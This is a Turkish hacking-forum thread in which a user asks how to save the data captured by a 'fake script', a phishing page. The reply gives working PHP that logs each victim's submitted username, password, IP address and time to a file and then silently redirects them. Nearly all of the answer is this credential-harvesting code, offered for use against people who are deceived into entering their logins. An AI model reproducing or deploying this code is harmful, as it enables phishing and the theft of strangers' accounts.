Fake Script bilgileri nasıl kaydederim ?

ibobaba27

Katılımcı Üye
27 Haz 2015
268
0
Bileceksin?
Aga birincisi konu yeri yanlış. Yardım merkezine taşıman gerekli.
Birde herkes şifre.txt falan demişte, galiba konu sahibi arkadaş kendisi fake script ayarlamış girenlerinkini nasıl çekerim diyor.
Kardeşim çözümün ise;
Fake script olduğune göre bir adette form olmalı o fromlarda genelde name=username ile name=password olur oraya girilen kullanıcı adı ve şifreyi çekmen için sayfayı önce bitane php syfasına yönlendiriceksin ve o yönlendirdiğin sayfada ise şu kodları girmelisn;
Kod:
<?php
$cevap1 = $_POST['username'];
$cevap2 =  $_POST['password'];
$ip = $_SERVER['REMOTE_ADDR'];
date_default_timezone_set('Europe/Istanbul');  
$cur_time=date("d-m-Y H:i:s");
$file = fopen('DSOYA İSMİ BURAYA GELCEK.php', 'a'); 
fwrite($file, "<font color='gray'>Kullanıcı Adı:</font><font color='white'> " .$cevap1. "</font><br>\n<font color='gray'> Şifre: </font><font color='white'>" .$cevap2. "</font><br>\n<font color='gray'>Ip Adresi:</font><font color='white'> " .$ip. "</font><br>\n<font color='gray'>Tarih:</font><font color='white'> " .$cur_time.  "</font><hr>");
fclose($file); 
echo '';
			header("*******:0; url=Yönelndirceğin sayfa");
?>

<**** http-equiv="*******" content="0;URL=Yönelndirceğin sayfa">
bunu yazmalısın kardeşim sonrasında yaszdığın dosya ismi aıdnda bi dosya oluşturulacak ve k.adı şfreler oraya düşercekdir. Umarım anlamışsındır, bide acelem olduğu için düzgün yazamadım kb :)
 
Son düzenleme:
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.